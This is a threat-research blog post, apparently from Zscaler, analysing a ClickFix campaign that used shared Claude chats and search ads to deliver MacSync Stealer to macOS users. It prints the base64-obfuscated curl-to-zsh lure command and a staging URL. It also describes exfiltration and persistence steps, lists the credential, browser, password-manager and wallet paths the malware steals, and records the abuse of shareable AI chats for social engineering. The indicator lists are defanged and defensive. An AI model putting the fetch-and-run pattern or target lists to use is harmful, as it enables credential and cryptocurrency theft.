Blog Zscaler

Ricevi gli ultimi aggiornamenti dal blog di Zscaler nella tua casella di posta

Security Research

ClaudeFix: Shared Claude Chats Meet ClickFix

image
RUCHNA NIGAM
luglio 15, 2026 - 13 Minuti di lettura

Introduction

ClickFix is a widely employed attack technique, first seen in 2024, where a victim is instructed to paste-and-run instructions on their system to “fix” a problem or install software. The seemingly benign instructions are, in fact, malicious and lead to the deployment of malware onto the victim’s system. Zscaler Threat Hunting has identified recent ClickFix attacks abusing Anthropic’s Claude platform through the use of shareable Claude chats to host these instructions, which marks a shift from typical attacks. As AI platforms have grown in popularity, threat actors have increasingly abused legitimate features such as shareable chats to lend credibility to malicious content. In this blog post, the Zscaler Threat Hunting team examines a MacSync Stealer campaign distributed through shared Claude chats.

Note: Zscaler Threat Hunting notified Anthropic about the misuse of its platform, and the campaign’s shared chats were no longer accessible at the time of publishing this blog.

Key Takeaways

  • The threat actors behind MacSync Stealer continue to evolve their techniques, tactics, and procedures (TTPs) by abusing AI platforms (such as Claude) to host ClickFix content and increase perceived legitimacy.
  • The threat actor behind MacSync Stealer has shifted distribution from via fake “cracked” applications to the now-common ClickFix technique.
  • Malvertising was a key part of this campaign. Attackers used paid ads to lure Mac users searching for Claude into shared Claude chats that instructed them to run ClickFix commands leading to the download of MacSync Stealer.
  • MacSync Stealer is capable of stealing credentials, sensitive files, and cryptocurrency wallet data.

Technical Analysis

The Zscaler Threat Hunting team observed multiple stages in this ClickFix attack chain.

First stage

The victim searches for a term such as “claude download” in a search engine and sees a paid ad in the results that points to a shared Claude chat link. From the start, the use of the official Claude domain adds legitimacy to the search result. The victim clicks on the paid ad and is redirected to a shared Claude chat, as shown in the figure below. 

MacSync Stealer ClickFix instructions hosted in a shared Claude chat.

Figure 1: MacSync Stealer ClickFix instructions hosted in a shared Claude chat.

Aside from the hosting platform itself being legitimate, threat actors also crafted the content to appear authentic. The chat is labeled “Shared by Apple Support” in the top right corner. The threat actors likely achieved this by setting their Claude display name as “Apple Support,” causing this label to appear when the shareable link is generated. 

The installation command the victim is instructed to run is a curl command with the destination URL obfuscated using Base64 encoding. The command typically follows the format: 

curl -kfsSL $(echo '[base64_string]'|base64 -D)|zsh 

The Base64-encoded string usually decodes to a URL in the format http://[domain]/curl/[a-f0-9]{64}$, which serves as the first stage of the MacSync Stealer infection. A curl request to this URL returns a Z shell (zsh) script, which is then piped directly to zsh, as specified at the end of the installation command.

An example of the MacSync Stealer staging URL is the following: 

http://lasvegaslaminateflooring[.]com/curl/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb

The zsh script returned from this URL contains a blob that is first Base64-decoded then decompressed using gzip to reveal a second-stage script. This second-stage script is executed in the terminal using the eval command shown at the end of the figure below.

Example Zsh script returned by the example first-stage URL distributing MacSync Stealer.

Figure 2: Example Zsh script returned by the example first-stage URL distributing MacSync Stealer.

Second stage

Functionally, this second-stage zsh script first redirects all output to /dev/null, essentially hiding all visible indications of execution. Next, the script downloads the third stage of MacSync Stealer, which contains the core stealing functionality, from a URL in the format $domain/dynamic?txd=$token, using the HTTP header api-key: $api_key (the values of $domain$token, and $api_key are hardcoded in the script). The downloaded content is then piped directly to osascript, leaving no file trace on the affected system.

Finally, the second-stage zsh script checks for the presence of a file named /tmp/osalogging.zip, which is expected to contain the sensitive information collected from the affected system. If the file exists and is non-zero in size, the script exfiltrates the collected data in 10MB chunks via HTTP PUT requests to a URL in the format:

$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks 

In this scheme, $domain and $token are hardcoded in the script, $upload_id is generated per system based on the date and a randomly generated number, $total_chunks is calculated by dividing the file size by 10MB, and $i is set by the loop counter as each chunk is sent. The script retries each chunk upload up to eight times if the upload fails.

After exfiltration is completed, the script deletes /tmp/osalogging.zip from the system, thereby leaving no trace of MacSync Stealer on the system.

Third stage

The third stage of the malware containing the core stealing functionality has the following capabilities: 

  • Tries to access ~/Library/Cookies/, likely to gauge the access level at which the script is running. If access fails, 

    • The malware modifies ~/.zshrc to append a curl command that downloads the MacSync second-stage script and pipes the output to zsh. The command has the same format as the command pasted and run by the user in the first stage. This functionality implements persistence ensuring the second-stage script is downloaded and executed each time the terminal is opened. 
    • It also prompts the victim to grant full disk access by showing a prompt saying "Please allow access and reopen the terminal" with title "Full Disk Access required!" and then opening the Security & Privacy pane where this setting can be enabled.

    If access is successful, the script removes the curl command implementing persistence from ~/.zshrc and continues with the steps below.

  • Creates the directory /tmp/macsync_0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb.lock which serves as a lock file indicating the information stealer is running.
  • Tricks the victim into entering their macOS password by showing a fake prompt.
  • Gathers stolen information into the directory /tmp/sync[randomNumber] with the capabilities described in the table below: 

Category

Capability

Credential access

 

Copies all keychain files (~/Library/Keychains/*.keychain-db).

Copies files from the folders Network/CookiesCookiesWeb DataLogin Data in the local browser-specific storage paths for Chromium-based browsers to the folder Browsers (a list of targeted Chromium-based browsers and their browser-specific paths can be found in the Appendix).

Copies browser files from Gecko-based browsers that may contain credentials (cookies.sqlite, cookies.sqlite-wal, cookies.sqlite-shm, formhistory.sqlite, formhistory.sqlite-wal, formhistory.sqlite-shm, key4.db, places.sqlite, places.sqlite-wal, places.sqlite-shm, signons.sqlite, cert9.db, logins.json, logins-backup.json) into the Browsers folder (a list of targeted Gecko-based browsers and their browser-specific paths can be found in the Appendix).

Searches for known browser extensions used as password managers in Chromium-based browsers and copies relevant local files into an Extensions folder (a list of targeted extensions can be found in the Appendix).

Discovery

 

Performs system discovery and populates a file called info with the victim’s username and password, along with device fingerprinting information such as software, hardware, and graphics information.

Gathers information about running processes and writes the results to SystemInfo/running_apps.txt and SystemInfo/processes.txt.

Collection

Copies shell configuration and history files (.zshrc, .zsh_history, .bash_history, .gitconfig) and potential cloud keys from ~/.ssh, ~/.aws~/.kube into a Profile folder.

Copies Telegram application files from /Users/[username]/Library/Application Support/Telegram Desktop/tdata/ to the folder Telegram Desktop.

Gathers files from selected directories (DownloadsDocuments, and Desktop) matching the extensions pdf, docx, doc, wallet, key, keys, db, txt, seed, rtf, kdbx, pem, and ovpn, and then stores them in a FileGrabber folder. The malware also targets select high-value files (including Safari Cookies/Autofill/History artifacts and Apple Notes files) and stores them in the same folder.

Cryptocurrency Chrome extension enumeration & collection

Searches for known Chromium extensions associated with cryptocurrency wallets and copies relevant local files into a Wallets/Web folder (a list of targeted extensions can be found in the Appendix).

Cryptocurrency desktop wallet application enumeration & collection

Copies entire folders corresponding to popular desktop cryptocurrency wallet applications into the Wallets/Desktop folder (a list of targeted folders can be found in the Appendix).

Table 1: MacSync Stealer data theft capabilities.

  • All data collected under /tmp/sync[randomNumber] is compressed into /tmp/osalogging.zip, which is then exfiltrated as described in the previous stage. After creating the archive, MacSync Stealer deletes the /tmp/sync* directory and removes the lock directory.
  • Finally, MacSync Stealer attempts to download three additional payloads if the applications Ledger Wallet, Ledger Live, and Trezor Suite respectively are present on the affected system from the following URLs:

    • lasvegaslaminateflooring[.]com/ledger/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb
    • lasvegaslaminateflooring[.]com/ledger/live/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb
    • lasvegaslaminateflooring[.]com/trezor/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb

    These payloads could not be retrieved at the time of analysis, but they are likely trojanized versions of the aforementioned applications.

Malvertising campaign observations

Since Zscaler Threat Hunting analyzes Zscaler Internet Access (ZIA) logs across customers, we were able to obtain broader visibility into the scope of this campaign. This campaign appears to have been short-lived, running from June 12–19, 2026. Based on the UTM parameters observed in the traffic, we determined the following: 

  • The source of the ad links was always Google.
  • We observed 22 unique campaign IDs.
  • We observed the following 7 unique utm_term values: 
    • claude
    • claude ai
    • claude code
    • claude mac
    • ai claude
    • claude code desktop mac
    • claude 客户 端 (client)

Zscaler Threat Hunting observed the malicious domains used in these ClickFix / MacSync Stealer campaigns adopted themes related to local services in U.S. cities. The list below shows a subset of domains following this pattern (a complete list is provided in the IOCs section at the end of this blog post):

  • realtorsmichigan[.]com
  • centralfloridapowerwash[.]com
  • syracusefertilitycenter[.]com
  • dogtrainersgeorgia[.]com
  • lasvegaslaminateflooring[.]com
  • moldinspectiondayton[.]com
  • newjerseypetsitter[.]com
  • miamipcsupport[.]com
  • lifecoachrochester[.]com
  • cabinrentalsnc[.]com
  • floridavacationvillarental[.]com
  • lasvegasweddingreception[.]com
  • dallasirrigationservices[.]com
  • toledotreeservices[.]com
  • homeinspectionsdelaware[.]com
  • chicagometalscrap[.]com

We also observed Russian-language comments in the third-stage AppleScript payload, suggesting the threat actor behind these attacks is likely Russian-speaking. The table below shows examples of these comments and their translation:

Russian-Language Comment

Translation

-- Простое копирование всех важных файлов (включая WAL/SHM)

-- Easily copy all important files (including WAL/SHM)

-- Убрана хрупкая SafeSQLiteCopy (часто падала когда Firefox запущен)

-- Removed fragile SafeSQLiteCopy (frequently crashed when Firefox was running)

Table 2: Russian-language comments and their corresponding translations. 

Conclusion

This ClickFix campaign distributing MacSync Stealer shows how threat actors are increasingly abusing trusted platforms for attacks. In this case, attackers used malvertising to direct users to shared Claude chats that contained ClickFix “paste-and-run” commands. Running those commands triggered a multi-stage infection chain that ultimately deployed MacSync Stealer on macOS devices, enabling credential and data theft. The Zscaler Threat Hunting team continues to track this activity and provides detections and IOCs to help identify and block related threats.

Zscaler Coverage

Zscaler’s multilayered cloud security platform detects indicators related to MacSync at various levels with the following threat names:

Indicators Of Compromise (IOCs)

Analyzed kill chain indicators
 

lasvegaslaminateflooring[.]com/curl/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb

lasvegaslaminateflooring[.]com/dynamic?txd=0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb

lasvegaslaminateflooring[.]com/ledger/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb

lasvegaslaminateflooring[.]com/ledger/live/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb

lasvegaslaminateflooring[.]com/trezor/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb


MacSync Stealer hosting domains 
 

proviewhomeinspections[.]com

meadow84[.]com

pearlanvil14[[.]]com

denverplumbingandwaterheater[.]com

verse-57[.]com

hawaiiwindowtinting[.]com

slate16[.]com

swisshomesforsale[.]com

pine-1[.]com

garagedoorskentucky[.]com

quest-38[.]com

floridakitchencabinet[.]com

workshoplens[.]com

shoresatin[.]com

rudder93[.]com

emberjourney18[.]com

pearlswift16[.]com

jozuvisuals[.]com

harbor-29[.]com

stratosnova14[.]com

healthcareqai[.]com

journey71[.]com

gainesvillewebsitedesign[.]com

dubaivehiclemart[.]com

genomicsforge[.]com

agingfighter[.]com

workshopcurrent[.]com

luxuryswisshomes[.]com

majordubai[.]com

ballad82[.]com

quill-67[.]com

coloradoaffordablelawyer[.]com

glowworkshop15[.]com

tide-39[.]com

fablecube15[.]com

realtorsmichigan[.]com

centralfloridapowerwash[.]com

pearl-49[.]com

vineworkshop1[.]com

syracusefertilitycenter[.]com

havenaspen2[.]com

plumechisel[.]com

chant-78[.]com

kiteshore[.]com

georgia[.]com

rudder-bloom[.]com

advertisingeffectively[.]com

kitefeather5[.]com

dogtrainersgeorgia[.]com

vibestride8[.]com

conenctagent[.]com

robscarpetcleaning[.]com

pdrncosmetics[.]com

satin87[.]com

lasvegaslaminateflooring[.]com

gatravelagency[.]com

harvest-53[.]com

trailshore17[.]com

stratos37[.]com

scope-quest[.]com

moldinspectiondayton[.]com

fern16[.]com

kernel-frame[.]com

newjerseypetsitter[.]com

lyricopal1[.]com

fern-76[.]com

miamipcsupport[.]com

languageschoolai[.]com

lakevine8[.]com

trekmesh15[.]com

vinebridge12[.]com

onyxkite[.]com

summit86[.]com

maplecirrus[.]com

quartzleap5[.]com

canvas-coral[.]com

satin40[.]com

anvil-wave[.]com

buynewgymequipment[.]com

renderframe20[.]com

cabinrentalsnc[.]com

slatesatin[.]com

lifecoachrochester[.]com

floridavacationvillarental[.]com

anvillyric1[.]com

leaflyric4[.]com

garden13[.]com

lasvegasweddingreception[.]com

stitchstratos[.]com

forgeboost16[.]com

summit-68[.]com

aspen32[.]com

flintfeather5[.]com

lens-kite[.]com

quest-raster[.]com

orbitstitch5[.]com

chisel-perch[.]com

balladspark[.]com

delta-66[.]com

meshfeed4[.]com

dramshopliabilityattorney[.]com

willow-blaze[.]com

tide-maple[.]com

nimbusstratos12[.]com

blueprintmesh[.]com

sreachagent[.]com

dallasirrigationservices[.]com

toledotreeservices[.]com

aigenerativeos[.]com

browserling[.]com

kernelfable[.]com

homeinspectionsdelaware[.]com

driftpress11[.]com

anvil-89[.]com

quillchisel20[.]com

codxeagent[.]com

5x5web[.]com

pinescope11[.]com

chicagometalscrap[.]com

rudderwillow8[.]com

olympiapetemergency[.]com

perch-74[.]com

affordabletentrentals[.]com

empexf[.]com

699524[.]cc

589669[.]cc

625167[.]cc

touristprogram[.]com

yoauction[.]com

forgequest2[.]com

sdlasik[.]com

charlottefilmstudios[.]com

cedar-satin[.]com

marbellaresales[.]com

web-stat-2685[.]com

smratagent[.]com

seattlefilmstudios[.]com

alabamarecoverycenter[.]com

paeviction[.]com

coloradoconstructionsupply[.]com

byrnewealthmanagement[.]com

homeinspectionnaperville[.]com

orbitstride7[.]com

vacationrentalvirginia[.]com

unifiedaiapi[.]com

iowagaragedoor[.]com

bestbuydomain[.]com

napavalleymentalhealth[.]com

purtwre[.]com

atlanticwoodworking[.]com

pubre[.]com

ursamade[.]com

trailblazehealth[.]com

znoeagent[.]com

alluringsites[.]com

api-metrics-5453[.]com

ncsolarpanel[.]com

apxeagent[.]com

fullcolorprinters[.]com

spotlessridesdetailing[.]com

drivinguber[.]com

wolfwraps[.]com

curretagent[.]com

elitefenceanddeck[.]com

cashlessend[.]com

buywx[.]com

kitchenbathremodels[.]com

aidevmaster[.]com

dallasoverheaddoors[.]com

aleeci[.]com

trufflecatering[.]com

ednasoftware[.]com

jerryshvac[.]com

kidsjumpandplay[.]com

kirkcharlie[.]com

cincycarpetcleaning[.]com

beachjiujitsu[.]com

whichitaautosales[.]com

houstonpestcontrolcompany[.]com

3plfast[.]com

xprssit[.]com

dualverify[.]com

fredscarpetcleaning[.]com

bcrealestateagency[.]com

fractocode[.]com

prmieagent[.]com

coeragent[.]com

suzke[.]com

belldredgingpump[.]com

kylesplumbing[.]com

miamidadenotary[.]com

nationalspacecouncil[.]com

briskinternet[.]com

modernhomeai[.]com

sonyda[.]com

envestassetmanagement[.]com

thevenueapartments[.]com

bitcoinlnwallet[.]com

ideanica[.]com

longbeachmartialarts[.]com

stelaragent[.]com

customroofingcontractors[.]com

greenactiv[.]com

lalandscapelighting[.]com

arbokfind[.]com

amedatur[.]com

aisolutions247[.]com

arbookfind[.]com


Appendix

Targeted Chromium-based browsers
 

Browser Name

Browser-specific Local Path

Yandex

/Users/[username]/Library/Application Support/Yandex/YandexBrowser/

Chrome

/Users/[username]/Library/Application Support/Google/Chrome/

Brave

/Users/[username]/Library/Application Support/BraveSoftware/Brave-Browser/

Edge

/Users/[username]/Library/Application Support/Microsoft Edge/

Vivaldi

/Users/[username]/Library/Application Support/Vivaldi/

Opera

/Users/[username]/Library/Application Support/com.operasoftware.Opera/

OperaGX

/Users/[username]/Library/Application Support/com.operasoftware.OperaGX/

Chrome Beta

/Users/[username]/Library/Application Support/Google/Chrome Beta/

Chrome Canary

/Users/[username]/Library/Application Support/Google/Chrome Canary

Chromium

/Users/[username]/Library/Application Support/Chromium/

Chrome Dev

/Users/[username]/Library/Application Support/Google/Chrome Dev/

Arc

/Users/[username]/Library/Application Support/Arc/User Data

Coccoc

/Users/[username]/Library/Application Support/CocCoc/Browser/

 

Targeted Gecko-based browsers
 

Browser Name

Browser-Specific Local Path

Firefox

/Users/[username]/Library/Application Support/Firefox/Profiles/

Zen

/Users/[username]/Library/Application Support/zen/Profiles/

LibreWolf

/Users/[username]/Library/Application Support/LibreWolf/Profiles/

Waterfox

/Users/[username]/Library/Application Support/Waterfox/Profiles/

 

Targeted password manager extensions
 

Extension ID

Extension Name

eiaeiblijfjekdanodkjadfinkhbfgcd

NordPass

aeblfdkhhhdcdjpifhhbdiojplfjncoa

1Password

bfogiafebfohielmmehodmfbbebbbpei

Keeper

nngceckbapebfimnlniiiahkandclblb

Bitwarden

fdjamakpfbbddfjaooikfcpabgjikfkp

Dashlane

hdokiejnpimakedhajhdlcegeplioahd

LastPass

pnlccmojcmeohlpggmfnbbiapkmbliob

RoboForm

ghmbeldphafepmbegfdlkpapadhbakde

Proton Pass

kmcfomidfpdkfieipokbalgegidffkal

Enpass

bnfdmghkeppfadphbnkjcicejfepnbfe

Sticky Password manager & safe

caljgklbbfbcjjanaijlacgncafpegll

Avira Password Manager

folnjigffmbjmcjgmbbfcpleeddaedal

LogMeOnce

igkpcodhieompeloncfnbekccinhapdb

Zoho Vault

admmjipmmciaobhojoghlmleefbicajg

Norton Password Manager

ehpbfbahieociaeckccnklpdcmfaeegd

RememBear

epanfjkfahimkgomnigadpkobaefekcd

IronVest

didegimhafipceonhjepacocaffmoppf

Passbolt

oboonakemofpalcgghocfoadofidjkkk

KeePassXC

jgnfghanfbjmimbdmnjfofnbcgpkbegj

KeePassHelper

mmhlniccooihdimnnjhamobppdhaolme

Kee - Password Manager

dbfoemgnkgieejfkaddieamagdfepnff

2FAS Auth

bhghoamapcdpbohphigoooaddinpkbai

Authenticator

lojeokmpinkpmpbakfkfpgfhpapbgdnd

Google Verified Access by Duo

ibpjepoimpcdofeoalokgpjafnjonkpc

TOTP Authenticator

gmohoglkppnemohbcgjakmgengkeaphi

2FA Authenticator

dckgbiealcgdhgjofgcignfngijpbgba

Open Two-Factor Authenticator

gmegpkknicehidppoebnmbhndjigpica

Web2FA - Authenticator

eiokpeobbgpinbmcanngjjbklmhlepan

MFAuth - 2FA Authenticator

odfkmgboddhcgopllebhkbjhokpojigd

Authenticator Extension

ppnbnpeolgkicgegkbkbjmhlideopiji

Microsoft Single Sign On

cejfhijdfemlohmcjknpbeaohedoikpp

Secure TOTP Authenticator

nmhjblhloefhbhgbfkdgdpjabaocnhha

mini authenticator

iklgijhacenjgjgdnpnohbafpbmnccek

2! Authenticator

ppkkcfblhfgmdmefkmkoomenhgecbemi

Authenticator for PC

lgndjfkadlbpaifdpbbobdodbaiaiakb

Authenticator App

bbphmbmmpomfelajledgdkgclfekilei

Authenticator app

 

Targeted cryptocurrency wallet extensions
 

Extension ID

Extension Name

nkbihfbeogaeaoehlefnkodbefgpgknn

MetaMask

bfnaelmomeimhlpmgjnjophhpkkoljpa

Phantom

hnfanknocfeofbddgcijnmhnfnkdnaad

Coinbase Wallet extension

fnjhmkhhmkbjkkabndcnnogagogbneec

Ronin Wallet

acmacodkjbdgmoleebolmdjonilkdbch

Rabby Wallet

egjidjbpglichdcondbcbdnbeeppgdph

Trust Wallet

aholpfdialjgjfhomihkjbmgjidlcdno

Exodus Web3 Wallet

pdliaogehgdbhbnmkklieghmmjkpigpa

Bybit Wallet

mcohilncbfahbmgdjkbpemcciiolgcge

OKX Wallet

hpglfhgfnhbgpjdenjgmdgoeiappafln

Guarda Crypto Wallet

bhhhlbepdkbapadjdnnojkbgioiodbic

Solflare Wallet

cjmkndjhnagcfbpiemnkdpomccnjblmj

Finnie

kamfleanhcmjelnhaeljonilnmjpkcjc

Inspect - Crypto | NFTs | DeFi | Web3

jnldfbidonfeldmalbflbmlebbipcnle

Bitfinity Wallet

fdcnegogpncmfejlfnffnofpngdiejii

Razor Wallet

klnaejjgbibmhlephnhpmaofohgkpgkd

Bearby

kjjebdkfeagdoogagbhepmbimaphnfln

Ultra Wallet

ldinpeekobnhjjdofggfgjlcehhmanlj

Leather

kpfchfdkjhcoekhdldggegebfakaaiog

FRWT Secure DeFi Crypto Wallet

idnnbdplmphpflfnlkomgpfbpcgelopg

Xverse: Bitcoin Crypto Wallet

mlhakagmgkmonhdonhkpjeebfphligng

ABC Wallet - Safe Web3 wallet

bipdhagncpgaccgdbddmbpcabgjikfkn

Clown Wallet

nhnkbkgjikgcigadomkphalanndcapjk

CLV Wallet

klghhnkeealcohjjanjjdaeeggmfmlpl

Zerion Wallet: Crypto & DeFi

ebfidpplhabeedpnhjnobghokpiioolj

Fewcha Move Wallet

emeeapjkbcbpbpgaagfchmcgglmebnen

Surf Wallet

fldfpgipfncgndfolcbkdeeknbbbnhcc

My Wallet: Crypto Wallet

penjlddjkjgpnkllboccdgccekpkcbin

OpenMask - TON wallet

hmeobnfnfcmdkdcmlblgagmfpfboieaf

Ctrl Wallet

omaabbefbmiijedngplfjmnooppbclkk

Tonkeeper — wallet for TON

jnlgamecbpmbajjfhmmmlhejkemejdma

Braavos: Bitcoin & Starknet Wallet

fpkhgmpbidmiogeglndfbkegfdlnajnf

Cosmostation Wallet

bifidjkcdpgfnlbcjpdkdcnbiooooblg

Fuelet Wallet | Fuel

amkmjjmmflddogmhpjloimipbofnfjih

Wombat - Gaming Wallet for Ethereum & EOS

aeachknmefphepccionboohckonoeemg

Coin98 Wallet Extension: Crypto & Defi

dmkamcknogkgcdfhhbddcghachkejeap

Keplr

aiifbnbfobpmeekipheeijimdpnlpgpp

Station Wallet

ehgjhhccekdedpbkifaojjaefeohnoea

Ambire Web3 Wallet

nknhiehlklippafakaeklbeglecifhad

Nabox Wallet

nphplpgoakhhjchkkhmiggakijnkhfnd

TON Wallet

ibnejdfjmmkpcnlpebklmnkoeoihofec

TronLink

afbcbjpbpfadlkmhmclhkeeodmamcflc

MathWallet

efbglgofoippbgcjepnhiblaibcnclgk

Martian Aptos & Sui Wallet Extension

fccgmnglbhajioalokbcidhcaikhlcpm

Zapit: Crypto Wallet & P2P Exchange

mgffkfbidihjpoaomajlbgchddlicgpn

Pali Wallet

fopmedgnkfpebgllppeddmmochcookhc

Suku Wallet

jojhfeoedkpkglbfimdfabpdfjaoolaf

Polymesh Wallet

abkahkcbhngaebpcgfmhkoioedceoigp

Casper Wallet

gkeelndblnomfmjnophbhfhcjbcnemka

Bitverse Wallet

hgbeiipamcgbdjhfflifkgehomnmglgk

Harbor - Crypto Wallet

ellkdbaphhldpeajbepobaecooaoafpg

ASI Alliance Wallet

mdnaglckomeedfbogeajfajofmfgpoae

Energy8 Wallet

ckklhkaabbmdjkahiaaplikpdddkenic

Internet Money | Crypto Wallet

fmblappgoiilbgafhjklehhfifbdocee

Forbole X

cnmamaachppnkjgnildpdmkaakejnhae

Auro Wallet

fijngjgcjhjmmpcmkeiomlglpeiijkld

Talisman Wallet

lbjapbcmmceacocpimbpbidpgmlmoaao

Metalet

ibljocddagjghmlpgihahamcghfggcjc

Virgo Wallet

gkodhkbmiflnmkipcmlhhgadebbeijhh

Soter | Aleo Wallet

dbgnhckhnppddckangcjbkjnlddbjkna

Fin Wallet For Sei

agoakfejjabomempkjlepdflaleeobhb

Core Wallet: Crypto Made Easy

dgiehkgfknklegdhekgeabnhgfjhbajd

Komodo Wallet

onhogfjeacnfoofkfgppdlbmlmnplgbn

SubWallet - Polkadot Wallet

ojggmchlghnjlapmfbnjholfjkiidbch

Venom Wallet

pmmnimefaichbcnbndcfpaagbepnjaig

FoxWallet

anokgmphncpekkhclmingpimjmcooifb

Compass Wallet

kkpllkodjeloidieedojogacfhpaihoh

Enkrypt: ETH, BTC and Solana Wallet

iokeahhehimjnekafflcihljlcjccdbe

Alby - Bitcoin Wallet for Lightning & Nostr

ifckdpamphokdglkkdomedpdegcjhjdp

ONTO Wallet

loinekcabhlmhjjbocijdoimmejangoa

Glass wallet | Sui wallet

fcfcfllfndlomdhbehjjcoimbgofdncg

Leap Wallet Extension

ifclboecfhkjbpmhgehodcjpciihhmif

Klever Wallet

ookjlbkiijinhpmnjffcofjonbfbgaoc

Temple Wallet

oafedfoadhdjjcipmcbecikgokpaphjk

CoinWallet: BTC Crypto Wallet

mapbhaebnddapnmifbbkgeedkeplgjmf

Biport Wallet

lgmpcpglpngdoalbgeoldeajfclnhafa

SafePal Extension Wallet

ppbibelpcjmhbdihakflkdcoccbgbkpo

UniSat Wallet

ffnbelfdoeiohenkjibnmadjiehjhajb

SecondFi (Yoroi)

opcgpfmipidbgpenhmajoajpbobppdil

Slush — A Sui wallet

hdkobeeifhdplocklknbnejdelgagbao

Crypto wallet – Bitcoin & USDT

lnnnmfcpbkafcpgdilckhmhbkkbpkmid

Koala Wallet

nbdhibgjnjpnkajaghbffjbkcgljfgdi

Ramper Wallet

kmhcihpebfmpgmihbkipcmlmmioameka

-

kmphdnilpmdejikjdnlbcnmnabepfgkh

OsmWallet - Your XRP wallet.

khpkpbbcccdmmclmpigdgddabeilkdpd

Suiet Sui Wallet

dlcobpjiigpikoobohmabehhmhfoodbb

Ready X

mkpegjkblkkefacfnmkajcjmabijhclg

Magic Eden Wallet

dldjpboieedgcmpkchcjcbijingjcgok

Fuel Wallet

jiidiaalihmmhddjgbnbgdfflelocpak

Bitget Wallet - Crypto, Web3 | Bitcoin & USDT


Targeted desktop wallet application folders
 

/Users/[username]/Library/Application Support/Exodus/

/Users/[username]/.electrum/wallets/

/Users/[username]/Library/Application Support/Atomic Wallet/Local Storage/leveldb/

/Users/[username]/Library/Application Support/Guarda/

/Users/[username]/Library/Application Support/Coinomi/wallets/

/Users/[username]/.sparrow/wallets/

/Users/[username]/.walletwasabi/client/Wallets/

/Users/[username]/Library/Application Support/Bitcoin/

/Users/[username]/Library/Application Support/Armory/

/Users/[username]/.electron-cash/wallets/

/Users/[username]/.bitmonero/wallets/

/Users/[username]/Library/Application Support/Litecoin/

/Users/[username]/Library/Application Support/DashCore/

/Users/[username]/Library/Application Support/Dogecoin/

/Users/[username]/.electrum-ltc/wallets/

/Users/[username]/Library/Application Support/BlueWallet/

/Users/[username]/Library/Application Support/Zengo/

/Users/[username]/Library/Application Support/Trust Wallet/

/Users/[username]/Library/Application Support/Ledger Live/

/Users/[username]/Library/Application Support/Ledger Wallet/

/Users/[username]/Library/Application Support/@trezor

 

form submtited
Grazie per aver letto

Questo post è stato utile?

Esclusione di responsabilità: questo articolo del blog è stato creato da Zscaler esclusivamente a scopo informativo ed è fornito "così com'è", senza alcuna garanzia circa l'accuratezza, la completezza o l'affidabilità dei contenuti. Zscaler declina ogni responsabilità per eventuali errori o omissioni, così come per le eventuali azioni intraprese sulla base delle informazioni fornite. Eventuali link a siti web o risorse di terze parti sono offerti unicamente per praticità, e Zscaler non è responsabile del relativo contenuto, né delle pratiche adottate. Tutti i contenuti sono soggetti a modifiche senza preavviso. Accedendo a questo blog, l'utente accetta le presenti condizioni e riconosce di essere l'unico responsabile della verifica e dell'uso delle informazioni secondo quanto appropriato per rispondere alle proprie esigenze.

Ricevi gli ultimi aggiornamenti dal blog di Zscaler nella tua casella di posta

Inviando il modulo, si accetta la nostra Informativa sulla privacy.